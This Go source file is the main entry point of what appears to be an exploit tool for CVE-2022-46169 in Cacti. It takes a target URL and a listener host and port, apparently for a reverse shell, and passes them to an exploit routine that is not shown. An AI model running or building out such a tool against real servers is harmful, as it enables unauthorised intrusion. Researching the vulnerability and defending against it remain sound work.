package main

import (
	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/cmd"
	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/exploiter"
)

func main() {
	urlTarget, lhost, lport := cmd.GetArguments()
	if urlTarget == "" || lhost == "" || lport == "" {
		return
	}

	exploiter.Exploit(urlTarget, lhost, lport)
}
